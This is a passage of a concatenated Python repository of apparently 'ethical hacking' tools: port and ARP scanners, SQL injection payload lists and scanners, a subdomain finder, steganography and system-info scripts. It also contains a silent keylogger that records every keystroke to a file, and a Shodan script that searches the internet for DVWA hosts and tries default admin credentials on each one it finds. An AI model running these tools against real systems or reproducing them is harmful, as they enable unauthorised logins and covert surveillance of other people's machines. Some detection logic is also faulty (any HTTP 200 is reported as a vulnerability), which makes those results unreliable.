'X-Powered-By: PHP' in response.headers: 14 | print('\033[92m [INFO] Target is using PHP') 15 | # Add vulnerability checks here 16 | else: 17 | print('\033[92m [ERROR] Target is not using PHP') 18 | else: 19 | print('\033[92m [ERROR] Could not connect to target') 20 | 21 | scan_vulnerabilities(input("\033[92m [+] Enter Url (i.e. https://example.com) : ")) 22 | -------------------------------------------------------------------------------- /portscanner-gui.py: -------------------------------------------------------------------------------- 1 | import socket,sys,threading,time 2 | from tkinter import * 3 | 4 | # ==== Scan Vars ==== 5 | ip_s = 1 6 | ip_f = 1024 7 | log = [] 8 | ports = [] 9 | target = 'enter the ip' 10 | 11 | # ==== Scanning Functions ==== 12 | def scanPort(target, port): 13 | try: 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | s.settimeout(4) 16 | c = s.connect_ex((target, port)) 17 | if c == 0: 18 | m = ' Port %d \t[open]' % (port,) 19 | log.append(m) 20 | ports.append(port) 21 | listbox.insert("end", str(m)) 22 | updateResult() 23 | s.close() 24 | except OSError: print('> Too many open sockets. Port ' + str(port)) 25 | except: 26 | c.close() 27 | s.close() 28 | sys.exit() 29 | sys.exit() 30 | 31 | def updateResult(): 32 | rtext = " [ " + str(len(ports)) + " / " + str(ip_f) + " ] ~ " + str(target) 33 | L27.configure(text = rtext) 34 | 35 | def startScan(): 36 | global ports, log, target, ip_f 37 | clearScan() 38 | log = [] 39 | ports = [] 40 | # Get ports ranges from GUI 41 | ip_s = int(L24.get()) 42 | ip_f = int(L25.get()) 43 | # Start writing the log file 44 | log.append('> Hulk Scanner') 45 | log.append('='*14 + '\n') 46 | log.append(' Target:\t' + str(target)) 47 | 48 | try: 49 | target = socket.gethostbyname(str(L22.get())) 50 | log.append(' IP Adr.:\t' + str(target)) 51 | log.append(' Ports: \t[ ' + str(ip_s) + ' / ' + str(ip_f) + ' ]') 52 | log.append('\n') 53 | # Lets start scanning ports! 54 | while ip_s <= ip_f: 55 | try: 56 | scan = threading.Thread(target=scanPort, args=(target, ip_s)) 57 | scan.setDaemon(True) 58 | scan.start() 59 | except: time.sleep(0.01) 60 | ip_s += 1 61 | except: 62 | m = '> Target ' + str(L22.get()) + ' not found.' 63 | log.append(m) 64 | listbox.insert(0, str(m)) 65 | 66 | def saveScan(): 67 | global log, target, ports, ip_f 68 | log[5] = " Result:\t[ " + str(len(ports)) + " / " + str(ip_f) + " ]\n" 69 | with open('portscan-'+str(target)+'.txt', mode='wt', encoding='utf-8') as myfile: 70 | myfile.write('\n'.join(log)) 71 | 72 | def clearScan(): 73 | listbox.delete(0, 'end') 74 | 75 | # ==== GUI ==== 76 | gui = Tk() 77 | gui.title('Hulk Scanner') 78 | gui.geometry("400x600+20+20") 79 | 80 | # ==== Colors ==== 81 | m1c = '#00ee00' 82 | bgc = '#222222' 83 | dbg = '#000000' 84 | fgc = '#111111' 85 | 86 | gui.tk_setPalette(background=bgc, foreground=m1c, activeBackground=fgc,activeForeground=bgc, highlightColor=m1c, highlightBackground=m1c) 87 | 88 | # ==== Labels ==== 89 | L11 = Label(gui, text = "Hulk Scanner", font=("Helvetica", 16, 'underline')) 90 | L11.place(x = 16, y = 10) 91 | 92 | L21 = Label(gui, text = "Target: ") 93 | L21.place(x = 16, y = 90) 94 | 95 | L22 = Entry(gui, text = "enter the ip") 96 | L22.place(x = 180, y = 90) 97 | L22.insert(0, "enter the ip") 98 | 99 | L23 = Label(gui, text = "Ports: ") 100 | L23.place(x = 16, y = 158) 101 | 102 | L24 = Entry(gui, text = "1") 103 | L24.place(x = 180, y = 158, width = 95) 104 | L24.insert(0, "1") 105 | 106 | L25 = Entry(gui, text = "1024") 107 | L25.place(x = 290, y = 158, width = 95) 108 | L25.insert(0, "1024") 109 | 110 | L26 = Label(gui, text = "Results: ") 111 | L26.place(x = 16, y = 220) 112 | L27 = Label(gui, text = "[ ... ]") 113 | L27.place(x = 180, y = 220) 114 | 115 | # ==== Ports list ==== 116 | frame = Frame(gui) 117 | frame.place(x = 16, y = 275, width = 370, height = 215) 118 | listbox = Listbox(frame, width = 59, height = 6) 119 | listbox.place(x = 0, y = 0) 120 | listbox.bind('<>') 121 | scrollbar = Scrollbar(frame) 122 | scrollbar.pack(side=RIGHT, fill=Y) 123 | listbox.config(yscrollcommand=scrollbar.set) 124 | scrollbar.config(command=listbox.yview) 125 | 126 | # ==== Buttons / Scans ==== 127 | B11 = Button(gui, text = "Start Scan", command=startScan) 128 | B11.place(x = 16, y = 500, width = 170) 129 | B21 = Button(gui, text = "Save Result", command=saveScan) 130 | B21.place(x = 210, y = 500, width = 170) 131 | 132 | # ==== Start GUI ==== 133 | gui.mainloop() 134 | -------------------------------------------------------------------------------- /portscanner.py: -------------------------------------------------------------------------------- 1 | # Import scapy 2 | import scapy.all as scapy 3 | # We need to create regular expressions to ensure that the input is correctly formatted. 4 | import re 5 | 6 | #logo 7 | print (''' 8 | ********************************************************************** 9 | * ___ _ ___ * 10 | * | _ \___ _ _| |_ / __| __ __ _ _ _ _ _ ___ _ _ * 11 | * | _/ _ \ '_| _| \__ \/ _/ _` | ' \| ' \/ -_) '_| * 12 | * |_| \___/_| \__| |___/\__\__,_|_||_|_||_\___|_| * 13 | * * 14 | * code from R3dHULK * 15 | * github page : https://github.com/R3DHULK * 16 | * * 17 | ********************************************************************** 18 | 19 | ********************************************************************** 20 | * * 21 | * [!] Use This With Sudo Command or It'll Throw An Error * 22 | * [!] Works fine on only Linux Enviroment * 23 | * * 24 | ********************************************************************** 25 | ''') 26 | 27 | # Regular Expression Pattern to recognise IPv4 addresses. 28 | ip_add_range_pattern = re.compile("^(?:[0-9]{1,3}\.){3}[0-9]{1,3}/[0-9]*$") 29 | 30 | # Get the address range to ARP 31 | while True: 32 | ip_add_range_entered = input("\nPlease enter the ip address and range that you want to send the ARP request to (ex 192.168.1.0/24): ") 33 | if ip_add_range_pattern.search(ip_add_range_entered): 34 | print(f"{ip_add_range_entered} is a valid ip address range") 35 | break 36 | 37 | 38 | # Try ARPing the ip address range supplied by the user. 39 | # The arping() method in scapy creates a pakcet with an ARP message 40 | # and sends it to the broadcast mac address ff:ff:ff:ff:ff:ff. 41 | # If a valid ip address range was supplied the program will return 42 | # the list of all results. 43 | arp_result = scapy.arping(ip_add_range_entered) 44 | input ("Enter To Exit") -------------------------------------------------------------------------------- /py-keylogger.py: -------------------------------------------------------------------------------- 1 | from pynput.keyboard import Key, Listener 2 | import logging 3 | 4 | logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s") 5 | 6 | def on_press(key): 7 | logging.info(str(key)) 8 | 9 | with Listener(on_press=on_press) as listener : 10 | listener.join() 11 | -------------------------------------------------------------------------------- /random_token_generator.py: -------------------------------------------------------------------------------- 1 | import secrets 2 | print(''' 3 | ******************************************************** 4 | * [?] Simple Random String Generator Tool [?] * 5 | * * 6 | * You Can Save Them In My Advanced Notepad Software * 7 | * Check Out : https://github.com/R3DHULK/hulk-office * 8 | * * 9 | ******************************************************** 10 | ''') 11 | val = int (input("How many no. of string you want to generate : ")) 12 | print("Your token is :", secrets.token_hex(val)) 13 | input("Enter To Close") -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | cryptography 3 | python-nmap 4 | impacket 5 | scapy 6 | rawsocketpy 7 | -------------------------------------------------------------------------------- /rockyou.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R3DHULK/python-for-ethical-hacking/ddb4ac0e15a27982b88edddfb880f855f174a933/rockyou.txt -------------------------------------------------------------------------------- /shodan_api.py: -------------------------------------------------------------------------------- 1 | import shodan 2 | import time 3 | import requests 4 | import re 5 | 6 | print(r''' 7 | ██████ ██░ ██ ▒█████ ▓█████▄ ▄▄▄ ███▄ █ 8 | ▒██ ▒ ▓██░ ██▒▒██▒ ██▒▒██▀ ██▌▒████▄ ██ ▀█ █ 9 | ░ ▓██▄ ▒██▀▀██░▒██░ ██▒░██ █▌▒██ ▀█▄ ▓██ ▀█ ██▒ 10 | ▒ ██▒░▓█ ░██ ▒██ ██░░▓█▄ ▌░██▄▄▄▄██ ▓██▒ ▐▌██▒ 11 | ▒██████▒▒░▓█▒░██▓░ ████▓▒░░▒████▓ ▓█ ▓██▒▒██░ ▓██░ 12 | ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░ ▒░▒░▒░ ▒▒▓ ▒ ▒▒ ▓▒█░░ ▒░ ▒ ▒ 13 | ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░ ▒ ▒ ▒ ▒▒ ░░ ░░ ░ ▒░ 14 | ░ ░ ░ ░ ░░ ░░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░ ░ ░ 15 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 16 | ░ 17 | use shodan via terminal 18 | ''') 19 | # your shodan API key 20 | SHODAN_API_KEY = input("Enter Your Shodan API Key Here : ") 21 | api = shodan.Shodan(SHODAN_API_KEY) 22 | 23 | # requests a page of data from shodan 24 | def request_page_from_shodan(query, page=1): 25 | while True: 26 | try: 27 | instances = api.search(query, page=page) 28 | return instances 29 | except shodan.APIError as e: 30 | print(f"Error: {e}") 31 | time.sleep(5) 32 | 33 | 34 | # Try the default credentials on a given instance of DVWA, simulating a real user trying the credentials 35 | # visits the login.php page to get the CSRF token, and tries to login with admin:password 36 | def has_valid_credentials(instance): 37 | sess = requests.Session() 38 | proto = ('ssl' in instance) and 'https' or 'http' 39 | try: 40 | res = sess.get(f"{proto}://{instance['ip_str']}:{instance['port']}/login.php", verify=False) 41 | except requests.exceptions.ConnectionError: 42 | return False 43 | if res.status_code != 200: 44 | print(f"[-] Got HTTP status code {res.status_code}, expected 200") 45 | return False 46 | # search the CSRF token using regex 47 | token = re.search(r"user_token' value='([0-9a-f]+)'", res.text).group(1) 48 | res = sess.post( 49 | f"{proto}://{instance['ip_str']}:{instance['port']}/login.php", 50 | f"username=admin&password=password&user_token={token}&Login=Login", 51 | allow_redirects=False, 52 | verify=False, 53 | headers={'Content-Type': 'application/x-www-form-urlencoded'} 54 | ) 55 | if res.status_code == 302 and res.headers['Location'] == 'index.php': 56 | # Redirects to index.php, we expect an authentication success 57 | return True 58 | else: 59 | return False 60 | 61 | # Takes a page of results, and scans each of them, running has_valid_credentials 62 | def process_page(page): 63 | result = [] 64 | for instance in page['matches']: 65 | if has_valid_credentials(instance): 66 | print(f"[+] valid credentials at : {instance['ip_str']}:{instance['port']}") 67 | result.append(instance) 68 | return result 69 | 70 | # searches on shodan using the given query, and iterates over each page of the results 71 | def query_shodan(query): 72 | print("[*] querying the first page") 73 | first_page = request_page_from_shodan(query) 74 | total = first_page['total'] 75 | already_processed = len(first_page['matches']) 76 | result = process_page(first_page) 77 | page = 2 78 | while already_processed < total: 79 | # break just in your testing, API queries have monthly limits 80 | break 81 | print("querying page {page}") 82 | page = request_page_from_shodan(query, page=page) 83 | already_processed += len(page['matches']) 84 | result += process_page(page) 85 | page += 1 86 | return result 87 | 88 | # search for DVWA instances 89 | res = query_shodan('title:dvwa') 90 | print(res) 91 | input("Enter To Exit Window") -------------------------------------------------------------------------------- /shut-my-pc-down.py: -------------------------------------------------------------------------------- 1 | import os 2 | import subprocess 3 | print("1. Shutdown Computer Immediately") 4 | print("2. Shutdown Computer after Given Time") 5 | print("3. Restart Computer Immediately") 6 | print("4. Restart Computer after Given Time") 7 | print("5. Lock My Computer Screen") 8 | print("6. Exit") 9 | print(end="Enter Your Choice: ") 10 | choice = int(input()) 11 | 12 | if choice==1: 13 | os.system("shutdown /s /t 0") 14 | elif choice==2: 15 | print(end="Enter Number of Seconds: ") 16 | sec = int(input()) 17 | strOne = "shutdown /s /t " 18 | strTwo = str(sec) 19 | str = strOne+strTwo 20 | os.system(str) 21 | elif choice==3: 22 | os.system("shutdown /r /t 0") 23 | elif choice==4: 24 | print(end="Enter Number of Seconds: ") 25 | sec = int(input()) 26 | strOne = "shutdown /r /t " 27 | strTwo = str(sec) 28 | str = strOne+strTwo 29 | os.system(str) 30 | elif choice == 5: 31 | subprocess.call('rundll32.exe user32.dll, LockWorkStation') 32 | elif choice==6: 33 | exit() 34 | else: 35 | print("Wrong Choice!") -------------------------------------------------------------------------------- /sites.txt: -------------------------------------------------------------------------------- 1 | example.com 2 | -------------------------------------------------------------------------------- /sql_injection_detector.py: -------------------------------------------------------------------------------- 1 | import requests,sys,time 2 | # import re # uncomment this for DVWA 3 | from bs4 import BeautifulSoup as bs 4 | from urllib.parse import urljoin 5 | from pprint import pprint 6 | 7 | s = requests.Session() 8 | s.headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36" 9 | 10 | # below code is for logging to your local DVWA 11 | # uncomment it if you want to use this on DVWA 12 | # login_payload = { 13 | # "username": "admin", 14 | # "password": "password", 15 | # "Login": "Login", 16 | # } 17 | # # change URL to the login page of your DVWA login URL 18 | # login_url = "http://localhost:8080/DVWA-master/login.php" 19 | 20 | # # login 21 | # r = s.get(login_url) 22 | # token = re.search("user_token'\s*value='(.*?)'", r.text).group(1) 23 | # login_payload['user_token'] = token 24 | # s.post(login_url, data=login_payload) 25 | 26 | print('''\033[92m 27 | ___ ___ _ ___ ___ _ _ 28 | / __|/ _ \| | |_ _| | \ ___| |_ ___ __| |_ ___ _ _ 29 | \__ \ (_) | |__ | | | |) / -_) _/ -_) _| _/ _ \ '_| 30 | |___/\__\_\____||___| |___/\___|\__\___\__|\__\___/_| 31 | 32 | example : python sql_injection_detector.py 33 | coded by R3DHULK 34 | Github Page : https://github.com/R3DHULK 35 | ''') 36 | try: 37 | def slowprint(s): 38 | for c in s + '\n' : 39 | sys.stdout.write(c) 40 | sys.stdout.flush() 41 | time.sleep(10. / 100) 42 | 43 | def get_all_forms(url): 44 | """Given a `url`, it returns all forms from the HTML content""" 45 | soup = bs(s.get(url).content, "html.parser") 46 | return soup.find_all("form") 47 | 48 | 49 | def get_form_details(form): 50 | """ 51 | This function extracts all possible useful information about an HTML `form` 52 | """ 53 | details = {} 54 | # get the form action (target url) 55 | try: 56 | action = form.attrs.get("action").lower() 57 | except: 58 | action = None 59 | # get the form method (POST, GET, etc.) 60 | method = form.attrs.get("method", "get").lower() 61 | # get all the input details such as type and name 62 | inputs = [] 63 | for input_tag in form.find_all("input"): 64 | input_type = input_tag.attrs.get("type", "text") 65 | input_name = input_tag.attrs.get("name") 66 | input_value = input_tag.attrs.get("value", "") 67 | inputs.append({"type": input_type, "name": input_name, "value": input_value}) 68 | # put everything to the resulting dictionary 69 | details["action"] = action 70 | details["method"] = method 71 | details["inputs"] = inputs 72 | return details 73 | 74 | 75 | def is_vulnerable(response): 76 | """A simple boolean function that determines whether a page 77 | is SQL Injection vulnerable from its `response`""" 78 | errors = { 79 | # MySQL 80 | "you have an error in your sql syntax;", 81 | "warning: mysql", 82 | # SQL Server 83 | "unclosed quotation mark after the character string", 84 | # Oracle 85 | "quoted string not properly terminated", 86 | } 87 | for error in errors: 88 | # if you find one of these errors, return True 89 | if error in response.content.decode().lower(): 90 | return True 91 | # no error detected 92 | return False 93 | 94 | 95 | def scan_sql_injection(url): 96 | # test on URL 97 | for c in "\"'": 98 | # add quote/double quote character to the URL 99 | new_url = f"{url}{c}" 100 | print("\033[93m [!] Trying", new_url) 101 | # make the HTTP request 102 | res = s.get(new_url) 103 | if is_vulnerable(res): 104 | # SQL Injection detected on the URL itself, 105 | # no need to preceed for extracting forms and submitting them 106 | print("\033[92m [+] SQL Injection vulnerability detected, link:", new_url) 107 | return 108 | # test on HTML forms 109 | forms = get_all_forms(url) 110 | slowprint(f"\033[92m [+] Detected {len(forms)} forms on {url}.") 111 | for form in forms: 112 | form_details = get_form_details(form) 113 | for c in "\"'": 114 | # the data body we want to submit 115 | data = {} 116 | for input_tag in form_details["inputs"]: 117 | if input_tag["value"] or input_tag["type"] == "hidden": 118 | # any input form that has some value or hidden, 119 | # just use it in the form body 120 | try: 121 | data[input_tag["name"]] = input_tag["value"] + c 122 | except: 123 | pass 124 | elif input_tag["type"] != "submit": 125 | # all others except submit, use some junk data with special character 126 | data[input_tag["name"]] = f"test{c}" 127 | # join the url with the action (form request URL) 128 | url = urljoin(url, form_details["action"]) 129 | if form_details["method"] == "post": 130 | res = s.post(url, data=data) 131 | elif form_details["method"] == "get": 132 | res = s.get(url, params=data) 133 | # test whether the resulting page is vulnerable 134 | if is_vulnerable(res): 135 | slowprint("\033[92m [+] SQL Injection vulnerability detected, link:", url) 136 | slowprint("\033[92m [+] Form:") 137 | pprint(form_details) 138 | break 139 | 140 | if __name__ == "__main__": 141 | import sys 142 | url = sys.argv[1] 143 | scan_sql_injection(url) 144 | except KeyboardInterrupt: 145 | slowprint("\n\033[91m [-] Exiting...") 146 | -------------------------------------------------------------------------------- /sqli-scanner-mod.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import time 4 | 5 | print('''\033[92m 6 | ___ ___ _ ___ ___ 7 | / __|/ _ \| | |_ _| / __| __ __ _ _ _ _ _ ___ _ _ 8 | \__ \ (_) | |__ | | \__ \/ _/ _` | ' \| ' \/ -_) '_| 9 | |___/\__\_\____|___| |___/\__\__,_|_||_|_||_\___|_| 10 | coded by R3DHULK 11 | Github Page : https://github.com/R3DHULK 12 | ''') 13 | 14 | 15 | def slowprint(s): 16 | for c in s + '\n': 17 | sys.stdout.write(c) 18 | sys.stdout.flush() 19 | time.sleep(10. / 100) 20 | 21 | 22 | try: 23 | 24 | def scan(url): 25 | # These are common SQL injection payloads 26 | payloads = ["' OR 1=1; --", 27 | "' OR '1'='1", 28 | "' or", 29 | "-- or", 30 | "' OR '1", 31 | "' OR 1 - - -", 32 | " OR ""= ", 33 | " OR 1 = 1 - - -", 34 | "' OR '' = '", 35 | "1' ORDER BY 1--+", 36 | "1' ORDER BY 2--+", 37 | "1' ORDER BY 3--+", 38 | 39 | "1' ORDER BY 1, 2--+", 40 | "1' ORDER BY 1, 2, 3--+", 41 | 42 | "1' GROUP BY 1, 2, --+", 43 | "1' GROUP BY 1, 2, 3--+", 44 | "' GROUP BY columnnames having 1= 1 - -", 45 | "-1' UNION SELECT 1, 2, 3--+", 46 | "OR 1 = 1", 47 | "OR 1 = 0", 48 | "OR 1= 1#", 49 | "OR 1 = 0#", 50 | "OR 1 = 1--", 51 | "OR 1= 0--", 52 | "HAVING 1 = 1", 53 | "HAVING 1= 0", 54 | "HAVING 1= 1#", 55 | "HAVING 1= 0#", 56 | "HAVING 1 = 1--", 57 | "HAVING 1 = 0--", 58 | "AND 1= 1", 59 | "AND 1= 0", 60 | "AND 1 = 1--", 61 | "AND 1 = 0--", 62 | "AND 1= 1#", 63 | "AND 1= 0#", 64 | "AND 1 = 1 AND '%' ='", 65 | "AND 1 = 0 AND '%' ='", 66 | "WHERE 1= 1 AND 1 = 1", 67 | "WHERE 1 = 1 AND 1 = 0", 68 | "WHERE 1 = 1 AND 1 = 1#", 69 | "WHERE 1 = 1 AND 1 = 0#", 70 | "WHERE 1 = 1 AND 1 = 1--", 71 | "WHERE 1 = 1 AND 1 = 0--", 72 | "ORDER BY 1--", 73 | "ORDER BY 2--", 74 | "ORDER BY 3--", 75 | "ORDER BY 4--", 76 | "ORDER BY 5--", 77 | "ORDER BY 6--", 78 | "ORDER BY 7--", 79 | "ORDER BY 8--", 80 | "ORDER BY 9--", 81 | "ORDER BY 10--", 82 | "ORDER BY 11--", 83 | "ORDER BY 12--", 84 | "ORDER BY 13--", 85 | "ORDER BY 14--", 86 | "ORDER BY 15--", 87 | "ORDER BY 16--", 88 | "ORDER BY 17--", 89 | "ORDER BY 18--", 90 | "ORDER BY 19--", 91 | "ORDER BY 20--", 92 | "ORDER BY 21--", 93 | "ORDER BY 22--", 94 | "ORDER BY 23--", 95 | "ORDER BY 24--", 96 | "ORDER BY 25--", 97 | "ORDER BY 26--", 98 | "ORDER BY 27--", 99 | "ORDER BY 28--", 100 | "ORDER BY 29--", 101 | "ORDER BY 30--", 102 | "ORDER BY 31337--", 103 | ] 104 | 105 | for payload in payloads: 106 | r = requests.get(url + payload) 107 | if r.status_code == 200: 108 | slowprint( 109 | f"\033[91m [+] SQL Injection Vulnerability Found In {url}") 110 | else: 111 | slowprint("\033[94m [-] Vulnerability Not Found") 112 | break 113 | 114 | # Test the scanner with a vulnerable URL 115 | scan(input("\033[92m [*] Enter URL: ")) 116 | 117 | except KeyboardInterrupt: 118 | slowprint("\n [-] Ctrl + C Detected...") 119 | 120 | input("\n\033[93m Enter To Exit") 121 | -------------------------------------------------------------------------------- /steganography.py: -------------------------------------------------------------------------------- 1 | # Python program implementing Image Steganography 2 | 3 | # PIL module is used to extract 4 | # pixels of image and modify it 5 | from PIL import Image 6 | import sys, os, time 7 | # Convert encoding data into 8-bit binary 8 | # form using ASCII value of characters 9 | def genData(data): 10 | 11 | # list of binary codes 12 | # of given data 13 | newd = [] 14 | 15 | for i in data: 16 | newd.append(format(ord(i), '08b')) 17 | return newd 18 | 19 | # Pixels are modified according to the 20 | # 8-bit binary data and finally returned 21 | def modPix(pix, data): 22 | 23 | datalist = genData(data) 24 | lendata = len(datalist) 25 | imdata = iter(pix) 26 | 27 | for i in range(lendata): 28 | 29 | # Extracting 3 pixels at a time 30 | pix = [value for value in imdata.__next__()[:3] + 31 | imdata.__next__()[:3] + 32 | imdata.__next__()[:3]] 33 | 34 | # Pixel value should be made 35 | # odd for 1 and even for 0 36 | for j in range(0, 8): 37 | if (datalist[i][j] == '0' and pix[j]% 2 != 0): 38 | pix[j] -= 1 39 | 40 | elif (datalist[i][j] == '1' and pix[j] % 2 == 0): 41 | if(pix[j] != 0): 42 | pix[j] -= 1 43 | else: 44 | pix[j] += 1 45 | # pix[j] -= 1 46 | 47 | # Eighth pixel of every set tells 48 | # whether to stop ot read further. 49 | # 0 means keep reading; 1 means thec 50 | # message is over. 51 | if (i == lendata - 1): 52 | if (pix[-1] % 2 == 0): 53 | if(pix[-1] != 0): 54 | pix[-1] -= 1 55 | else: 56 | pix[-1] += 1 57 | 58 | else: 59 | if (pix[-1] % 2 != 0): 60 | pix[-1] -= 1 61 | 62 | pix = tuple(pix) 63 | yield pix[0:3] 64 | yield pix[3:6] 65 | yield pix[6:9] 66 | 67 | def encode_enc(newimg, data): 68 | w = newimg.size[0] 69 | (x, y) = (0, 0) 70 | 71 | for pixel in modPix(newimg.getdata(), data): 72 | 73 | # Putting modified pixels in the new image 74 | newimg.putpixel((x, y), pixel) 75 | if (x == w - 1): 76 | x = 0 77 | y += 1 78 | else: 79 | x += 1 80 | 81 | # Encode data into image 82 | def encode(): 83 | img = input(" [+] Enter image name(with extension) : ") 84 | image = Image.open(img, 'r') 85 | 86 | data = input(" [+] Enter data to be encoded : ") 87 | if (len(data) == 0): 88 | raise ValueError(' [!] Data is empty') 89 | 90 | newimg = image.copy() 91 | encode_enc(newimg, data) 92 | 93 | new_img_name = input(" [+] Enter the name of new image(with extension) : ") 94 | newimg.save(new_img_name, str(new_img_name.split(".")[1].upper())) 95 | 96 | # Decode the data in the image 97 | def decode(): 98 | img = input(" [+] Enter image name(with extension) : ") 99 | image = Image.open(img, 'r') 100 | 101 | data = '' 102 | imgdata = iter(image.getdata()) 103 | 104 | while (True): 105 | pixels = [value for value in imgdata.__next__()[:3] + 106 | imgdata.__next__()[:3] + 107 | imgdata.__next__()[:3]] 108 | 109 | # string of binary data 110 | binstr = '' 111 | 112 | for i in pixels[:8]: 113 | if (i % 2 == 0): 114 | binstr += '0' 115 | else: 116 | binstr += '1' 117 | 118 | data += chr(int(binstr, 2)) 119 | if (pixels[-1] % 2 != 0): 120 | return data 121 | try: 122 | # Main Function 123 | def slowprint(s): 124 | for c in s + '\n' : 125 | sys.stdout.write(c) 126 | sys.stdout.flush() 127 | time.sleep(10. / 100) 128 | slowprint("\n \033[92m Screen Loading...") 129 | slowprint("\033[91m Welcome To Basic Steganography Technique ") 130 | time.sleep(2) 131 | def main(): 132 | a = int(input("\033[92m 1. Encode\n\033[91m 2. Decode\n\033[94m Choose : ")) 133 | if (a == 1): 134 | encode() 135 | slowprint("\n\033[92m [+] Encoded Successfully ") 136 | elif (a == 2): 137 | slowprint(" \n\033[91m Decoded Word : " + decode()) 138 | slowprint("\n\033[91m [-] Decoded Successfully ") 139 | else: 140 | raise Exception("\n\033[91m [!] Enter correct input") 141 | 142 | # Driver Code 143 | if __name__ == '__main__' : 144 | 145 | # Calling main function 146 | main() 147 | except KeyboardInterrupt: 148 | print("\n\033[91m [-] Ctrl+C Detected.....Exiting......") 149 | time.sleep(2) 150 | -------------------------------------------------------------------------------- /subdomain-finder.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | domain = input("[+] Input url to get subdomains : ") 4 | print ("[+] Waiting progress ... \n") 5 | print(''' 6 | [*] You Engaged Hulk For Finding Subdomains : 7 | 8 | [*] Trying his best ... 9 | 10 | ''') 11 | 12 | def main(domain): 13 | url = "https://sonar.omnisint.io/subdomains/{}".format(domain) 14 | data = requests.get(url).json() 15 | print ("[+] Hulk came up with : \n") 16 | for i in data: 17 | print(i) 18 | open('Result.txt','a').write(str(i) + '\n') 19 | 20 | if __name__ == '__main__': 21 | main(domain) 22 | print(" ") 23 | print("\033[1m" + "<== Process Finished ==>" + "\033[0m") 24 | input("Press Enter To Exit") -------------------------------------------------------------------------------- /sys-info.py: -------------------------------------------------------------------------------- 1 | import psutil 2 | import platform 3 | from datetime import datetime 4 | 5 | print(""" 6 | ****************************************** 7 | * ___ ___ __ * 8 | * / __|_ _ _____|_ _|_ _ / _|___ * 9 | * \__ \ || (_-<___| || ' \| _/ _ \ * 10 | * |___/\_, /__/ |___|_||_|_| \___/ * 11 | * |__/ * 12 | * * 13 | * gather system information real quick * 14 | * a code from r3dhulk * 15 | ****************************************** 16 | """) 17 | 18 | def get_size(bytes, suffix="B"): 19 | """ 20 | Scale bytes to its proper format 21 | e.g: 22 | 1253656 => '1.20MB' 23 | 1253656678 => '1.17GB' 24 | """ 25 | factor = 1024 26 | for unit in ["", "K", "M", "G", "T", "P"]: 27 | if bytes < factor: 28 | return f"{bytes:.2f}{unit}{suffix}" 29 | bytes /= factor 30 | 31 | 32 | print("="*40, "System Information", "="*40) 33 | uname = platform.uname() 34 | print(f"System: {uname.system}") 35 | print(f"Node Name: {uname.node}") 36 | print(f"Release: {uname.release}") 37 | print(f"Version: {uname.version}") 38 | print(f"Machine: {uname.machine}") 39 | print(f"Processor: {uname.processor}") 40 | 41 | # Boot Time 42 | print("="*40, "Boot Time", "="*40) 43 | boot_time_timestamp = psutil.boot_time() 44 | bt = datetime.fromtimestamp(boot_time_timestamp) 45 | print(f"Boot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}") 46 | 47 | # let's print CPU information 48 | print("="*40, "CPU Info", "="*40) 49 | # number of cores 50 | print("Physical cores:", psutil.cpu_count(logical=False)) 51 | print("Total cores:", psutil.cpu_count(logical=True)) 52 | # CPU frequencies 53 | cpufreq = psutil.cpu_freq() 54 | print(f"Max Frequency: {cpufreq.max:.2f}Mhz") 55 | print(f"Min Frequency: {cpufreq.min:.2f}Mhz") 56 | print(f"Current Frequency: {cpufreq.current:.2f}Mhz") 57 | # CPU usage 58 | print("CPU Usage Per Core:") 59 | for i, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)): 60 | print(f"Core {i}: {percentage}%") 61 | print(f"Total CPU Usage: {psutil.cpu_percent()}%") 62 | 63 | # Memory Information 64 | print("="*40, "Memory Information", "="*40) 65 | # get the memory details 66 | svmem = psutil.virtual_memory() 67 | print(f"Total: {get_size(svmem.total)}") 68 | print(f"Available: {get_size(svmem.available)}") 69 | print(f"Used: {get_size(svmem.used)}") 70 | print(f"Percentage: {svmem.percent}%") 71 | print("="*20, "SWAP", "="*20) 72 | # get the swap memory details (if exists) 73 | swap = psutil.swap_memory() 74 | print(f"Total: {get_size(swap.total)}") 75 | print(f"Free: {get_size(swap.free)}") 76 | print(f"Used: {get_size(swap.used)}") 77 | print(f"Percentage: {swap.percent}%") 78 | 79 | # Disk Information 80 | print("="*40, "Disk Information", "="*40) 81 | print("Partitions and Usage:") 82 | # get all disk partitions 83 | partitions = psutil.disk_partitions() 84 | for partition in partitions: 85 | print(f"=== Device: {partition.device} ===") 86 | print(f" Mountpoint: {partition.mountpoint}") 87 | print(f" File system type: {partition.fstype}") 88 | try: 89 | partition_usage = psutil.disk_usage(partition.mountpoint) 90 | except PermissionError: 91 | # this can be catched due to the disk that 92 | # isn't ready 93 | continue 94 | print(f" Total Size: {get_size(partition_usage.total)}") 95 | print(f" Used: {get_size(partition_usage.used)}") 96 | print(f" Free: {get_size(partition_usage.free)}") 97 | print(f" Percentage: {partition_usage.percent}%") 98 | # get IO statistics since boot 99 | disk_io = psutil.disk_io_counters() 100 | print(f"Total read: {get_size(disk_io.read_bytes)}") 101 | print(f"Total write: {get_size(disk_io.write_bytes)}") 102 | 103 | # Network information 104 | print("="*40, "Network Information", "="*40) 105 | # get all network interfaces (virtual and physical) 106 | if_addrs = psutil.net_if_addrs() 107 | for interface_name, interface_addresses in if_addrs.items(): 108 | for address in interface_addresses: 109 | print(f"=== Interface: {interface_name} ===") 110 | if str(address.family) == 'AddressFamily.AF_INET': 111 | print(f" IP Address: {address.address}") 112 | print(f" Netmask: {address.netmask}") 113 | print(f" Broadcast IP: {address.broadcast}") 114 | elif str(address.family) == 'AddressFamily.AF_PACKET': 115 | print(f" MAC Address: {address.address}") 116 | print(f" Netmask: {address.netmask}") 117 | print(f" Broadcast MAC: {address.broadcast}") 118 | # get IO statistics since boot 119 